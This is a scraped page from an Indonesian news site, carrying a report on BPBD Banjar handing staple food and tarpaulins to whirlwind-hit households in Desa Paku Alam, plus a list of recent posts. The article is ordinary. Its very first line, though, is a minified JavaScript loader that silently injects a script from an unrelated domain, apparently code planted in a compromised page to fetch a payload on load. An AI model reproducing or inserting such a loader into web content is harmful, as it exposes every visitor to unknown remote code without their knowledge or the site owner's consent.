(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Warga Desa Paku Alam Terima Bantuan Sembako dan Terpal dari BPBD Banjar


KANALKALIMANTAN.COM, MARTAPURA – Badan Penanggulan Bencana Daerah (BPBD) Kabupaten Banjar serahkan bantuan sosial bencana puting beliung di Desa Paku Alam, Kecamatan Sungai Tabuk, Rabu (18/10/2023).

Desa Paku Alam satu dari 11 desa di Kecamatan Sungai Tabuk yang terdampak angin puting beliung.

Akibat angin puting beliung Senin (16/10/2023) lalu, BPBD Banjar mendata ada 26 rumah dengan 35 kepala keluarga dan 101 jiwa terdampak bencana.

Tidak hanya rumah tinggal milik warga, bangunan Madrasah Aliyah Raudatul Islamiyah, Madrasah Tsanawiyah Raudatul Islamiyah dan penggilingan padi H Lukman dan As’ari ikut tersapu angin kencang.

Baca juga: Cak Imin Tak Takut Suara NU Direbut Mahfud MD

Kepala Desa Paku Alam, Sapi’e mewakili warganya yang terdampak musibah angin puting beliung mengucapkan terima kasih kepada BPBD Banjar yang sudah memberi bantuan yang langsung diantar ke lokasi.

Bantuan yang diberikan oleh BPBD Kabupaten Banjar berupa terpal, minyak goreng, gula, mie instan dan lainnya

Kepala Desa Paku Alam mengharapkan bantuan yang lain berupa bahan material bangunan seperti kayu dan atap yang paling diperlukan warga.

“Kami dari pemerintah desa juga membantu warga yang terdampak angin puting beliung dengan sebatas kemampuan kami,” ucap Sapi’e.

Baca juga: Anies-Cak Imin Resmi Daftar Capres-Cawapres ke KPU

“Mudah-mudahan ada hikmah dibalik musibah ini dan bagi keluarga yang terkena musibah diberikan oleh Allah kesabaran,” doanya.

Sementara itu, Kalak BPBD Kabupaten Banjar, Warsita mengatakan, bantuan tersebut bisa bermanfaat bagi warga yang mendapat musibah.

“Kami berikan bantuan berupa sembako dan terpal, sesuai dengan daftar data yang masuk yaitu untuk Desa Paku Alam ada 26 rumah, terdiri dari 35 kepala keluarga dengan 101 jiwa,” katanya.

BPBD Banjar akan mendata secara detail kondisi kerusakan rumah akibat musibah untuk diusulkan mendapatkan bantuan sosial sesuai aturan yang berlaku. (Kanalkalimantan.com/nh)

Reporter : nh
Editor : kk


Risa

Recent Posts

Hidup Makin Tenang, Hadapi Risiko dengan Asuransi Pelita dari BRI Life

KANALKALIMANTAN.COM, - Asuransi merupakan salah satu bentuk perlindungan yang perlu dimiliki setiap orang. Dengan memiliki… Read More

9 jam ago

10 Mei Hari Lupus Sedunia, Yuk Kenali Penyakit Lupus

KANALKALIMANTAN.COM - Peringatan Hari Lupus Sedunia ini diadakan pada tanggal 10 Mei setiap tahunnya. Hari… Read More

9 jam ago

Teror Buaya Muara di Pelambuan, Warga Diminta Jauhi Sungai

KANALKALIMANTAN.COM, BANJARMASIN - Buaya yang kerap muncul di Sungai Pelambuan, Kecamatan Banjarmasin Barat, Kota Banjarmasin,… Read More

9 jam ago

Satgas Distribusi Material ke Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pelaksaanan program TNI Manunggal Membangun Desa (TMMD) ke-120 Kodim 1001/HSU-BLG di Desa… Read More

13 jam ago

Yakin ‘Pemilik’ 13 Kursi Golkar, Acil Odah Lamar Nasdem Koalisi di Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Hj Raudatul Jannah atau Acil Odah siap ramaikan kontestasi Pemilihan Kepala Daerah… Read More

16 jam ago

Musrenbang RPJPD 2025-2045, Bahas Rencana Program HSU 20 Tahun ke Depan

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten Hulu Sungai Utara melaksanakan Musyawarah Perencanaan Pembangunan (Musrenbang) Rencana Pembangunan… Read More

16 jam ago

This website uses cookies.